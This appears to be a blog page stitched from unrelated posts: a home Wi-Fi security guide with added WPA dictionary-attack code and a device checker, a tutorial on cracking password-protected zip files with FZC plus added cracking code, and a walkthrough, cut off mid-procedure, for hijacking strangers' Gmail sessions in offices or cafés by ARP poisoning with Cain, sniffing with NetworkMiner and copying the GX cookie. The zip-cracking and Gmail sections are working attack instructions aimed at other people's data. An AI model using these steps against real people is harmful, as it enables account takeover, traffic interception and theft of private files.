This article describes how you can secure your Wireless Network from hackers and you’ll also learn about free tools that people generally use to intercept your Wi-Fi signals.
Wireless Networking (Wi-Fi) has made it so easy for you to use the computer, portable media player, mobile phones, video game consoles, and other wireless devices anywhere in the house without the clutter of cables.
With traditional wired networks, it is extremely difficult for someone to steal your bandwidth but the big problem with wireless signals is that others can access the Internet using your broadband connection even while they are in a neighboring building or sitting in a car that’s parked outside your apartment.
This practice, also known as piggybacking, is bad for three reasons:
* It will increase your monthly Internet bill especially when you have to pay per byte of data transfer.
* It will decrease your Internet access speed since you are now sharing the same internet connection with other users.
* It can create a security hazard* as others may hack your computers and access your personal files through your own wireless network.
[*] What do the bad guys use - There have been quite a few instances where innocent Internet users were arrested for sending hate emails when in reality their email accounts had been hacked through the unsecured Wi-Fi networks they had at home. Wireshark is a free packet sniffing tool for Linux, Mac and Windows that can capture the traffic flowing through a wireless network, including cookies, form submissions and other HTTP requests; anything sent over plain HTTP on an open network is readable this way.
How to Secure Your Wireless Network
The good news is that it is not very hard to make your wireless network secure, which will both prevent others from stealing your internet and will also prevent hackers from taking control of your computers through your own wireless network.
Here are a few simple things that you should do to secure your wireless network:
Step 1. Open your router settings page
Your router's settings page is opened in a web browser at the router's own address (usually a 192.168.* address, printed in the manual or on a sticker on the router). You can also use Google to find the manuals for most routers online in case you lost the printed manual that came with your router. For your reference, here are some of the popular router brands – Linksys, Cisco, Netgear, Apple AirPort, SMC, D-Link, Buffalo, TP-LINK, 3Com, Belkin.
Step 2. Create a unique password on your router
Once you have logged into your router, the first thing you should do to secure your network is to change the default password* of the router to something more secure.
This prevents others from logging into the router and undoing the security settings you are about to configure. You can change the password from the Administration section of your router's settings page. The default values are generally admin / password, and they are identical on every unit the manufacturer ships.
[*] What do the bad guys use - This is a public database[http://www.cirt.net/passwords] of default usernames and passwords of wireless routers, modems, switches and other networking equipment. For instance, anyone can easily see from the database that the factory-default settings for Linksys equipment can be accessed by using admin for both the username and password fields.
Step 3. Change your Network’s SSID name
The SSID (or Wireless Network Name) of your Wireless Router is usually pre-defined as "default" or is set to the brand name of the router (e.g., linksys). Although this will not make your network inherently* more secure, changing the SSID is a good idea for two reasons: it makes obvious which network you are connecting to, and a unique SSID defeats the precomputed WPA cracking tables that attackers build for common default names (the SSID is mixed into the WPA/WPA2 key derivation as the salt).
This setting is usually under the basic wireless settings in your router's settings page. Once this is set, you will always be sure that you are connecting to the correct Wireless network even if there are multiple wireless networks in your area. Don't use your name, home address or other personal information in the SSID, and don't bother hiding (not broadcasting) the SSID: it adds no security, as the note below explains.
[*] What do the bad guys use
Wi-Fi scanning tools like inSSIDer[http://www.metageek.net/products/inssider] (Windows) and Kismet (Mac, Linux) are free and will let anyone find all the available Wireless Networks in an area, even if the routers are not broadcasting their SSID name, because the SSID still appears in the clear in the frames that connecting clients send.
Step 4. Enable Network Encryption
In order to prevent other computers in the area from using your internet connection, and from reading the traffic that goes over it, you need to encrypt your wireless signals.
There are several encryption methods for wireless settings, including WEP, WPA (WPA-Personal) and WPA2 (Wi-Fi Protected Access version 2). WEP is the oldest and least secure (it can be cracked* in minutes from captured traffic no matter how long the key is), but is compatible with a wide range of devices including older hardware; WPA2 is the most secure but is only compatible with hardware manufactured since 2006.
To enable encryption on your Wireless network, open the wireless security settings on your router's configuration page. This will usually let you select which security method you wish to use; choose WPA2 with AES. Do not fall back to WEP for the sake of an old device, since that leaves the whole network open; a device that only supports WEP is better replaced. Enter a passphrase to access the network: WPA/WPA2 passphrases can be 8 to 63 characters long, so use a long one that is hard to guess, and consider a combination of letters, numbers and special characters. The passphrase is the one thing an attacker has to guess, so its strength is what the security of the network rests on.
[*] What do the bad guys use
Aircrack-ng and coWPAtty are free tools that allow even non-hackers to recover WEP and WPA (PSK) keys. WEP keys are recovered statistically from a few tens of thousands of captured packets, which is why key length does not help; WPA/WPA2-PSK passphrases are recovered by running a dictionary or brute-force attack against a captured handshake, which only succeeds when the passphrase is weak. A video on YouTube suggests that Aircrack-ng can be used to break Wi-Fi encryption from a jail-broken iPhone or an iPod Touch.
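To make the two preceding points concrete (the SSID acting as the salt in Step 3, and the dictionary attack on the passphrase in Step 4), here is an added example; it is not code from the original post, nor from Aircrack-ng or coWPAtty. It derives the WPA/WPA2-PSK key the way the standard specifies (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 32-byte output) and runs a wordlist against a captured key. The real tools verify each candidate against the handshake's MIC rather than against the raw PSK, which adds a few cheap HMACs per guess; the cost per guess is dominated by the 4096 iterations shown here. The wordlists and the "linksys"/"MyHomeNet" networks are constructed; the "password"/"IEEE" vector is the one published in IEEE 802.11i.

```python
"""WPA/WPA2-PSK derivation and the wordlist attack run against it.
Added example for this article, not code from the original post or from
aircrack-ng / coWPAtty. The wordlists and SSIDs below are constructed."""
import hashlib
import hmac


def wpa_psk(passphrase, ssid):
    """PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).

    The SSID is the salt, so a precomputed table of PSKs is only valid for
    one network name; that is the real reason to change a default SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def dictionary_attack(target_psk, ssid, wordlist):
    """Try each word of the list against the captured PSK, as a cracker does.

    Returns the passphrase on success, None when the list is exhausted."""
    for word in wordlist:
        word = word.strip()
        if not 8 <= len(word) <= 63:
            continue  # cannot be a valid passphrase, no point hashing it
        if hmac.compare_digest(wpa_psk(word, ssid), target_psk):
            return word
    return None


def precompute_table(ssid, wordlist):
    """Rainbow-table style precomputation: PSK -> passphrase for ONE ssid.

    Attackers build these for popular default SSIDs ("linksys", "default")
    so that cracking a network with that name is a lookup, not a search."""
    return {wpa_psk(w, ssid): w for w in wordlist if 8 <= len(w) <= 63}


if __name__ == "__main__":
    # Test vector from IEEE 802.11i (passphrase "password", SSID "IEEE").
    print(wpa_psk("password", "IEEE").hex())
    captured = wpa_psk("dragonfly", "linksys")      # constructed target network
    words = ["letmein1", "short", "dragonfly", "qwertyuiop"]
    print(dictionary_attack(captured, "linksys", words))   # dragonfly
    table = precompute_table("linksys", words)
    print(table.get(captured))                         # dragonfly
    print(table.get(wpa_psk("dragonfly", "MyHomeNet")))   # None: different SSID
```

A table built for "linksys" is useless against a network called "MyHomeNet" even if both use the same passphrase, which is the whole value of Step 3; a passphrase that is not in any wordlist is what makes Step 4 hold.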
Step 5. Filter MAC addresses
Whether you have a laptop or a Wi-Fi enabled mobile phone, all your wireless devices have a unique MAC address (this has nothing to do with an Apple Mac) just like every computer connected to the Internet has a unique IP address. For an added layer of protection, you can add the MAC addresses of all your devices to your wireless router’s settings so that only the specified devices can connect to your Wi-Fi network.
MAC addresses are burned into your networking hardware, but the operating system can override them in software, so it is, unfortunately, easy to spoof a MAC address*. An attacker must first learn one of the MAC addresses of the devices that are allowed on your Wireless network before he can spoof it, which is not hard (see below).
To enable MAC address filtering, first make a list of all the hardware devices that you want to connect to your wireless network**. Find their MAC addresses, and then add them to the MAC address filtering list in your router's administrative settings. You can find the MAC address of a Windows computer by opening Command Prompt and typing "ipconfig /all", which shows the MAC address beside the name "Physical Address" (on Mac and Linux, ifconfig or ip link shows it). You can find the MAC addresses of Wi-Fi mobile phones and other portable devices under their network settings, though this will vary for each device.
[*] What do the bad guys use - Someone can change the MAC address of his or her own computer to one of your device's addresses and connect to your network, since the router allows connections from that particular MAC address. The MAC addresses of every device on a Wi-Fi network travel in the clear in every frame, even when the network is encrypted, so a wireless sniffer like Kismet (mentioned above) lists them without even joining the network, and a scanner like Nmap shows them once on the LAN; the attacker then changes the MAC address of his own computer with a free tool like MAC Shift (or a single ifconfig / ip link command on Mac and Linux). MAC filtering is therefore a speed bump, not a lock.
Step 6. Reduce the Range of the Wireless Signal
If your wireless router has a high range but you are staying in a small studio apartment, you can consider decreasing the signal range, for instance by lowering the transmit power if the router offers that setting, or by changing the mode of your router to 802.11g (instead of 802.11n or 802.11b). Changing the wireless channel does not reduce the range. Whatever you do here, an attacker with a directional antenna can still pick up a weak signal from far away, so treat this as a minor tweak and not as a replacement for encryption.
You can also try placing the router under the bed, inside a shoe box or wrap a foil around the router antennas so that you can somewhat restrict the direction of signals.
Apply the Anti-Wi-Fi Paint – Researchers have developed a special Wi-Fi blocking paint that can help you stop neighbors from picking up your home network. The paint contains chemicals that block radio signals by absorbing them. "By coating an entire room, Wi-Fi signals can't get in and, crucially, can't get out." This is not a substitute for encryption at the router level: anyone inside the painted room, or at a gap in the coating, is still on your network.
Step 7. Upgrade your Router’s firmware
You should check the manufacturer's site occasionally to make sure that your router is running the latest firmware, since firmware updates fix security holes in the router itself. You can find the current firmware version of your router on the router's dashboard at its 192.168.* address.
Connect to your Secure Wireless Network
To conclude, WPA2 (AES) encryption with a really strong passphrase is what actually secures your wireless network; MAC address filtering on top of it adds a small extra hurdle. Together they are probably the best way to secure a home wireless network.
Once you have enabled the various security settings in your wireless router, you need to add the new settings to your computers and other wireless devices so that they all can connect to the Wi-Fi network. You can select to have your computer automatically connect to this network, so you won’t have to enter the SSID, passphrase and other information every time you connect to the Internet.
Your wireless network will now be a lot more secure and intruders may have a tough time intercepting your Wi-Fi signals.
Who is Connected to your Wireless Network
If you are worried that an outsider may be connecting to the Internet using your Wireless network, try AirSnare – it's a free utility that watches for unexpected MAC addresses on your Wireless network as well as DHCP requests. Another option is to open your router's administration page (using the 192.168.* address) and look for the DHCP Clients Table (it's under Status > Local Network on Linksys routers). Here you will see a list of all computers and wireless devices that are connected to your home network.
*It is also a good idea to turn off the router completely when you are not planning to use the computer for a longer period (like when you are out shopping). You save on electricity and the door remains 100% shut for wireless piggybackers.
**If you ever want to let a new device connect to your network, you will have to find its MAC address and add it to your router. If you simply want to let a friend connect to your wireless network one time, you can remove their MAC address from the router settings when they leave your place.
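The DHCP Clients Table check from the "Who is Connected" section, combined with the device list you built for MAC filtering in Step 5, can be automated. The following is an added example (not from the original post, and not how AirSnare works internally): it parses a DHCP lease list in the format written by dnsmasq, the DHCP server inside many home routers, normalizes MAC addresses from the notations you will meet (ipconfig /all prints 00-1A-2B-..., most other tools print 00:1a:2b:..., Cisco gear prints 001a.2b3c....), and reports every device that is not on your allow-list. The lease lines, hostnames and MAC addresses are constructed.

```python
"""Compare a router's DHCP lease list with an allow-list of known devices.
Added example, not from the original post; all lease lines, hostnames and
MAC addresses below are constructed."""
import re


def normalize_mac(mac):
    """Accept '00-1A-2B-3C-4D-5E' (ipconfig /all), '001a.2b3c.4d5e' (Cisco)
    or '00:1a:2b:3c:4d:5e' and return the lower-case colon-separated form."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(digits) != 12:
        raise ValueError("not a MAC address: %r" % mac)
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def parse_dnsmasq_leases(text):
    """dnsmasq.leases lines look like:
    <expiry epoch> <mac> <ip> <hostname or *> <client-id or *>"""
    leases = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # blank or malformed line
        leases.append({"mac": normalize_mac(parts[1]),
                       "ip": parts[2],
                       "host": parts[3]})
    return leases


def unknown_devices(leases, allowed_macs):
    """Every lease whose MAC is not in the allow-list, in file order."""
    allowed = {normalize_mac(m) for m in allowed_macs}
    return [lease for lease in leases if lease["mac"] not in allowed]


# Constructed sample: two known devices and one visitor on 192.168.1.15.
SAMPLE_LEASES = """\
1262000000 00:1a:2b:3c:4d:5e 192.168.1.2 mylaptop 01:00:1a:2b:3c:4d:5e
1262000100 00:1f:3b:aa:bb:cc 192.168.1.3 android-phone *
1262000200 08:00:27:12:34:56 192.168.1.15 * *
"""

# The allow-list as you would copy it from 'ipconfig /all' and a phone's
# network settings: mixed separators and case are handled.
ALLOWED_MACS = ["00-1A-2B-3C-4D-5E", "00:1f:3b:AA:BB:CC"]


def report(text=SAMPLE_LEASES, allowed=ALLOWED_MACS):
    """Return (ip, mac, hostname) for each device that should not be there."""
    return [(d["ip"], d["mac"], d["host"])
            for d in unknown_devices(parse_dnsmasq_leases(text), allowed)]


if __name__ == "__main__":
    for ip, mac, host in report():
        print("unexpected device: %s %s %s" % (ip, mac, host))
```

Remember the caveat from Step 5: a device that spoofs one of your allowed MAC addresses will not show up here, so this catches careless piggybackers, not a determined attacker.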
Sunday, December 27, 2009
Wednesday, September 23, 2009
Cracking Winzip passwords

Tutorial on cracking zip password files
What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.
FZC uses multiple methods of cracking: brute force (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks; instead of guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at http://www.theargon.com).
FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.
The first thing I want to say is that reading this tutorial is the easy way to learn how to use this program, but after reading it you should go and check the text files that come with the program and read them all. You will also see the phrase "check name.txt" often in this text; those files are in FZC's directory and contain more information about FZC.
FZC is a good password recovery tool because it is very fast and also supports resuming, so you don't have to keep the computer turned on until you get the password, as you did some years ago with older cracking programs. You will usually get the password eventually unless it is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or uppercase letter, or a symbol such as ! or &), because 32 chars is the maximum length that FZC will accept; but that doesn't really matter, because to brute-force a 32-char password you would need to be immortal. To see the time that FZC takes with brute force, open the Bforce.txt file, which contains such information.
FZC supports brute-force attacks as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require wordlists, which you can get from http://www.theargon.com. There are wordlists in various languages, on various topics, or just miscellaneous wordlists. The bigger the wordlist, the better your chances of cracking the password.
Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait... and have good thoughts like "in wordlist mode I'm gonna get the password in minutes" or something like this... and then remember "hey, this guy went through all this bullshit and didn't say how I can start a wordlist attack!" So please wait just a little more, read this tutorial till the end and you will be able to do all this "bullshit".
Keep in mind that some people choose really weird passwords (for example: 'e8t7@$^%*gfh), which are much harder to crack and practically impossible to crack with a wordlist (unless you have some weird wordlist). If you have bad luck and get such a file, a 200MB list won't help you. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is put aside your sweet xxx MB list and start using the brute-force attack.
If you have a really fast new computer and you're afraid that you won't be able to use its power to the fullest because the zip cracker doesn't support this kind of hardware, it's your lucky day: FZC has multiple settings for all sorts of hardware and will automatically select the best method.
Now that we've gone through all the theoretical stuff, let's get to the actual commands.
--------------------------------------------------------------------------------
Bruteforce
--------------------------------------------------------------------------------
The command line you'll need to use for using brute force is:
fzc -mb -nzFile.zip -lChr Length -cType of chars
Now if you read the bforce.txt that comes with fzc you'll find the description of how Chr Length and the Type of chars work, but I'm going to explain this too. Why not, right? (But remember to look at bforce.txt too.)
For Chr Length you can use 4 kinds of switches...
-> You can use a range -> 4-6 : it would brute force from 4-char passwords to 6-char passwords
-> You can use just one length -> 5 : it would just brute force using passwords with 5 chars
-> You can also use the number zero -> 0 : it would start brute forcing from passwords of length 0 up to length 32; even if you are crazy I don't think you would do this... if you are thinking of doing this, get a life...
-> You can use the + sign with a number -> 3+ : in this case it would brute force from passwords of length 3 to passwords of 32 chars, almost like the last option...
For the Type of chars we have 5 switches, they are:
-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using symbols (check the Bforce.txt if you want to see which symbols)
-> s for using space
-> 1 for using numbers
Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:
fzc -mb -nzTest.zip -l4-7 -ca1
This would try all combinations of passwords from 4 chars of length up to 7 chars, but using only numbers and lowercase letters.
*****
hint
*****
You should never start the first brute-force attack on a file using all the char switches. First try just lowercase, then uppercase, then uppercase with numbers, then lowercase with numbers; do it like this because you can get lucky and find the password much faster. If this doesn't work, prepare your brain and start a brute force that will take a lot of time, with a combination of lowercase, uppercase, special chars and numbers.
--------------------------------------------------------------------------------
Wordlist
--------------------------------------------------------------------------------
As I said above, and as you should be thinking by now, the wordlist is the most powerful mode in this program. Using this mode, you can choose between 3 sub-modes, each of which applies certain changes to the words in the wordlist; I'm not going to say what each mode does to the words, just check the file wlist.txt. The only thing I'm going to tell you is that the best mode for getting passwords is mode 3, but it takes longer too.
To start a wordlist attack you'll do something like:
fzc -mwMode number -nzFile.zip -nwWordlist
Where:
Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory as FZC you'll need to give the full path.
You can add other switches to that line, like -fLine, where you define at which line FZC will start reading, and -lChar Length, where only the words of that length will be tried; the switch works like in brute-force mode.
So if you type something like
fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+
FZC would start reading at line 50 and would only try words with length >= 9.
Example:
If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:
fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50
--------------------------------------------------------------------------------
Resuming
--------------------------------------------------------------------------------
Another good feature of FZC is that it supports resuming. If you need to shut down your computer while FZC is running, you just need to press the ESC key and fzc will stop. If you are using a brute-force attack the current status will be saved in a file called resume.fzc, but if you are using a wordlist it will tell you at which line it stopped (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:
fzc -mr
And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's going to start. So if you stopped the attack on file.zip at line 100, using wordlist.txt in mode 3, to resume you'll type
fzc -mw3 -nzfile.zip -nwwordlist.txt -f100
Doing this, FZC would start at line 100, since the other 99 lines were already checked in an earlier FZC session.
Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program.
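For readers who want to see what FZC actually does with each guess, here is an added example; it is not FZC's code and not part of the original tutorial. It implements the traditional PKWARE "ZipCrypto" stream cipher (the password protection WinZip used at the time), the 12-byte encryption header that precedes every encrypted entry, and the two attack modes described above: a wordlist with a start line (like -nw with -f) and a brute force over a character set and a length range (like -c with -l). The point it shows is why zip cracking is so fast: the last header byte must equal the high byte of the entry's CRC-32, so a wrong password is rejected after decrypting just 12 bytes, with a 1-in-256 chance of a false positive that a full decrypt then catches. The plaintext, the passwords and the wordlist are constructed.

```python
"""Traditional PKWARE ("ZipCrypto") encryption and the header-check shortcut
that zip crackers such as FZC rely on. Added example for this page; it is not
FZC's code, and the sample data and passwords are constructed."""
import binascii
import itertools
import os

# Table for the CRC-32 step used inside the cipher (reflected poly 0xEDB88320).
_CRC_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _crc32_step(crc, byte):
    return _CRC_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """Key schedule and keystream of APPNOTE section 6.1 (three 32-bit keys)."""

    def __init__(self, password):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    def _update(self, b):
        self.k0 = _crc32_step(self.k0, b)
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_step(self.k2, self.k1 >> 24)

    def _keystream_byte(self):
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data):
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)          # keys are updated with the PLAINTEXT byte
        return bytes(out)

    def decrypt(self, data):
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def encrypt_entry(password, data):
    """What PKZIP stores for one entry: a 12-byte encrypted header (11 random
    bytes, then the high byte of the CRC-32), the encrypted data, and the
    CRC-32 of the plaintext in the central directory."""
    crc = binascii.crc32(data) & 0xFFFFFFFF
    header = os.urandom(11) + bytes([crc >> 24])
    z = ZipCrypto(password)
    return z.encrypt(header), z.encrypt(data), crc


def header_check(password, enc_header, crc):
    """The cheap test: decrypt 12 bytes and compare the last one with the CRC
    high byte. A wrong password passes with probability 1/256."""
    return ZipCrypto(password).decrypt(enc_header)[-1] == crc >> 24


def full_check(password, enc_header, enc_data, crc):
    """The expensive confirmation: decrypt everything and recompute the CRC."""
    z = ZipCrypto(password)
    z.decrypt(enc_header)                      # advances the keystream
    return binascii.crc32(z.decrypt(enc_data)) & 0xFFFFFFFF == crc


def crack(candidates, enc_header, enc_data, crc):
    """First candidate that survives both checks, or None."""
    for pw in candidates:
        if header_check(pw, enc_header, crc) and full_check(pw, enc_header, enc_data, crc):
            return pw
    return None


def wordlist_candidates(lines, start_line=1):
    """FZC's -nw wordlist with -f: yield words from a 1-based start line."""
    for line in lines[start_line - 1:]:
        yield line.strip().encode()


def brute_candidates(charset, min_len, max_len):
    """FZC's -c charset with -l range: every string of each length, in order."""
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield bytes(combo)


if __name__ == "__main__":
    hdr, body, crc = encrypt_entry(b"7341", b"constructed sample plaintext, any bytes work")
    print(crack(wordlist_candidates(["letmein", "7341", "secret"]), hdr, body, crc))  # b'7341'
    print(crack(brute_candidates(b"0123456789", 1, 4), hdr, body, crc))             # b'7341'
```

Because only the 12-byte header is touched for most guesses, the cost per candidate is about sixteen key updates, which is why a numeric or lowercase brute force of short lengths finishes quickly and why the hint above (try the small character sets first) pays off.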
Hack a Gmail account with the GX cookie

Assumptions:
You are on a Local Area Network (LAN) in a switched or wireless environment, for example an office, cyber café or mall.
You know basic networking.
Tools used for this attack:
Cain & Abel (download)
NetworkMiner (download)
Firefox web browser with the Cookie Editor add-on (download)
Details:
We assume you are connected to a LAN/Wireless network. Our main goal is to capture the Gmail GX cookie from the network. We can only capture the cookie when someone is actually using his Gmail. I've noticed that in computer classes people normally check their email near the start. If you are in a cyber café or a mall then there are more chances of catching people using Gmail.
We will go step by step,
If you are on an open wireless network then you can skip Step A.
A] Using Cain to do ARP poisoning and routing:
A switch forwards unicast traffic only to the port where the destination MAC address lives. When X and Y are communicating with each other on a switched network, Z does not see what X & Y are saying, so in order to sniff that communication you have to poison the ARP caches of X & Y so that they send their traffic to Z. On an open wireless network you don't have to do poisoning, because the access point acts like a HUB that forwards all communication to all its recipients (note: this only holds for an open network; on an encrypted WPA/WPA2 network each client's traffic is encrypted with its own key, so there you need ARP poisoning as well).
Start Cain from Start > Program > Cain > Cain
Click on the Start/Stop Sniffer tool icon on the tool bar. We will first scan the network to see which IPs are in use; this list will also help us launch the attack on the victim.
Then click on the Sniffer tab, then the Hosts tab below. Right click within that spreadsheet and click on Scan MAC Addresses; in the Target section select All hosts in my subnet and press OK. This will list all hosts connected to your network. You will notice that the physical IP of your own machine is not in that list.
How to check your physical IP?
> Click on Start > Run, type cmd and press enter; in the command prompt type
ipconfig and press enter. This shows the IP address assigned to your PC.
It will have following outputs:
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xyz.com
IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
The main things to note here are your IP address and your Default Gateway.
Make a note of your IP Address & default gateway. From Cain you will see the list of IP addresses; here you have to choose a free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.
Click on Configure > APR > Use Spoofed IP and MAC Address > IP
Type in 192.168.1.10, and from the Poisoning section click on "Use ARP request Packets" and click on OK.
Within the Sniffer tab, click on the APR tab below; from the left hand side click on APR, then click on the empty spreadsheet at the top right and click the plus sign in the toolbar. It will show you a list of IP addresses on the left hand side. Here we will target the victim's IP address and the default gateway.
The purpose is to ARP-poison both the victim and the default gateway so that the victim's traffic is routed via your machine. From the left side click on the victim's IP address; we assume the victim is using 192.168.1.15. The moment you click on the victim IP you will see the remaining list on the right hand side; here select the default gateway IP address, i.e. 192.168.1.1, then click on OK.
Finally, click on the Start/Stop Sniffer tool menu once again, and next click on Start/Stop APR. This will start poisoning the victim and the default gateway.
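Here is what Step A does on the wire, as an added example that is not part of the original post and not Cain's code. It builds the two ARP frames an attacker sends (one telling the victim that the gateway's IP lives at the attacker's MAC, one telling the gateway the same about the victim's IP), parses them back, and then runs the check a network monitor such as arpwatch performs: an IP address whose sender MAC suddenly changes is the signature of exactly this poisoning. The frames are only built as bytes in memory, never sent; the IP addresses are the ones used in the walkthrough, the MAC addresses are constructed. Cain's "Use ARP request Packets" option corresponds to passing ARP_REQUEST instead of ARP_REPLY.

```python
"""ARP poisoning frames and the IP-to-MAC flap detection that catches them.
Added example; not the original post's or Cain's code. Frames are built and
parsed in memory only. IPs follow the walkthrough, MACs are constructed."""
import ipaddress
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
_ARP_FMT = "!HHBBH6s4s6s4s"            # htype ptype hlen plen oper sha spa tha tpa
_ARP_LEN = struct.calcsize(_ARP_FMT)   # 28 bytes


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp(oper, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet header + ARP body. The sender fields are what the receiver
    writes into its ARP cache, so a poisoner puts the IP it wants to
    impersonate in sender_ip and its OWN MAC in sender_mac."""
    arp = struct.pack(_ARP_FMT, 1, 0x0800, 6, 4, oper,
                      mac_bytes(sender_mac), ipaddress.IPv4Address(sender_ip).packed,
                      mac_bytes(target_mac), ipaddress.IPv4Address(target_ip).packed)
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not ARP."""
    if len(frame) < 14 + _ARP_LEN or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, oper, sha, spa, tha, tpa = struct.unpack(_ARP_FMT, frame[14:14 + _ARP_LEN])
    return {"oper": oper,
            "sha": mac_str(sha), "spa": str(ipaddress.IPv4Address(spa)),
            "tha": mac_str(tha), "tpa": str(ipaddress.IPv4Address(tpa))}


def poison_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip,
                oper=ARP_REPLY):
    """The two frames Cain's APR sends, repeated every few seconds: the victim
    learns 'gateway_ip is at attacker_mac', the gateway learns 'victim_ip is
    at attacker_mac', so both directions of the victim's traffic pass through
    the attacker. oper=ARP_REQUEST mimics the 'Use ARP request Packets' option."""
    return [build_arp(oper, attacker_mac, gateway_ip, victim_mac, victim_ip),
            build_arp(oper, attacker_mac, victim_ip, gateway_mac, gateway_ip)]


def detect_flaps(frames):
    """arpwatch-style monitor: remember the MAC each IP last claimed and alert
    when it changes. Returns (ip, old_mac, new_mac) tuples."""
    last_seen, alerts = {}, []
    for frame in frames:
        arp = parse_arp(frame)
        if arp is None:
            continue
        ip, mac = arp["spa"], arp["sha"]
        if ip in last_seen and last_seen[ip] != mac:
            alerts.append((ip, last_seen[ip], mac))
        last_seen[ip] = mac
    return alerts


# Constructed MAC addresses; the IPs are those used in the walkthrough.
GATEWAY_MAC, GATEWAY_IP = "00:11:22:33:44:01", "192.168.1.1"
VICTIM_MAC, VICTIM_IP = "00:11:22:33:44:15", "192.168.1.15"
ATTACKER_MAC = "de:ad:be:ef:00:10"          # the host that took spare 192.168.1.10


def sample_capture():
    """Legitimate replies from gateway and victim, then the poisoning pair."""
    legit = [build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
             build_arp(ARP_REPLY, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)]
    return legit + poison_pair(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)


if __name__ == "__main__":
    for ip, old, new in detect_flaps(sample_capture()):
        print("ARP flap: %s moved from %s to %s" % (ip, old, new))
```

On the defending side, a static ARP entry for the gateway on the victim, or dynamic ARP inspection on a managed switch, makes the two poison frames ineffective; the flap detector above is what tells you the attack is happening at all.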
B] Using NetworkMiner to capture the cookie in plain text
We are using NetworkMiner to capture the cookie, but NetworkMiner can be used for many things: capturing text, images, HTTP parameters and files. NetworkMiner is normally used in passive reconnaissance to collect the IP addresses, domains and OS fingerprints of the devices talking to your machine. If you don't have NetworkMiner you can use any other sniffer such as Wireshark, Iris Network Scanner, NetWitness etc.
We are using this tool because of its ease of use.
Open NetworkMiner by clicking its exe (please note it requires the .NET Framework).
From the "---Select a network adapter in the list---" dropdown, select your adapter. If you are using a wired Ethernet network then the adapter will have Ethernet in its name along with the IP address of your machine; if you are using wireless, the adapter name will contain Wireless and your IP address. Select the one you are using and click Start.
Important: before you start, make sure you are not browsing any websites or using any instant messaging, and that you have cleared all cookies from Firefox.
Click on the Credentials tab above. This tab will capture all HTTP cookies; pay close attention to the "Host" column, where you should see mail.google.com at some point. If you locate a mail.google.com entry, then in the same entry right click on the Username column, click on "copy username", then open Notepad and paste the copied content there.
Turn off word wrap in Notepad and search for GX in the line. What you captured will contain many cookies from Gmail, each separated by a semicolon; the GX cookie starts with GX= and ends with a semicolon, and you have to copy everything between the = and the semicolon.
Example: GX= axcvb1mzdwkfefv ; <- copy only axcvb1mzdwkfefv
